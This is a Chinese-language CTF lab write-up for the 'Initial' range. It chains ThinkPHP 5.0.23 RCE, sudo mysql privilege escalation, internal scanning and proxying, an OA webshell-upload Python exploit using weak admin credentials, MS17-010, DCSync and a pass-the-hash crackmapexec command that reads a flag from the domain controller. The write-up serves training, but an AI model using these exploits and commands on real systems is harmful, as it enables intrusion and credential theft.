我顶!

春秋云镜-Initial

外网

开始的时候给了一个ip 直接扫描端口

image-20240711142405669

80端口 上去看看

注意到是title 明显是thinkphp

image-20240711142625959

工具跑一下 发现存在ThinkPHP 5.0.23 RCE

image-20240711142710207

一键getshell之后 蚁剑连接

上传linux-exploit-suggester 到tmp目录下 提权

image-20240711143055046

可以看到sudo 提权

sudo -l 查看

image-20240711143303675

mysql存在sudo权限

image-20240711143523781

注意的是蚁剑的shell是模拟出来的shell 不能直接使用/bin/sh 提权

得到flag1

1
flag{60b53231-

查看内网ip

image-20240711144248224

上传 fscan 扫描内网

image-20240711144418930

搭建代理 传递流量出来

172.22.1.18

image-20240711161126409

弱密码admin/admin123 登录

image-20240711161206244

网上翻找有没有payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open("D:\\Desktop\\1.php", 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

一句话木马连接 得到第二段flag

image-20240711162151167

1
flag02: 2ce3-4813-87d4-

172.22.1.21

扫出来存在MS17-010 永恒之蓝漏洞 msfpayload直接打就行

image-20240711163402552

shell 进入交互shell 查看 没存在flag

image-20240711163630848

172.22.1.2(DC)

DCsync导出域内用户hashimage-20240711164118443

1
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

得到flag3

1
flag03: e8f88d0d43d6}

image-20240711170802948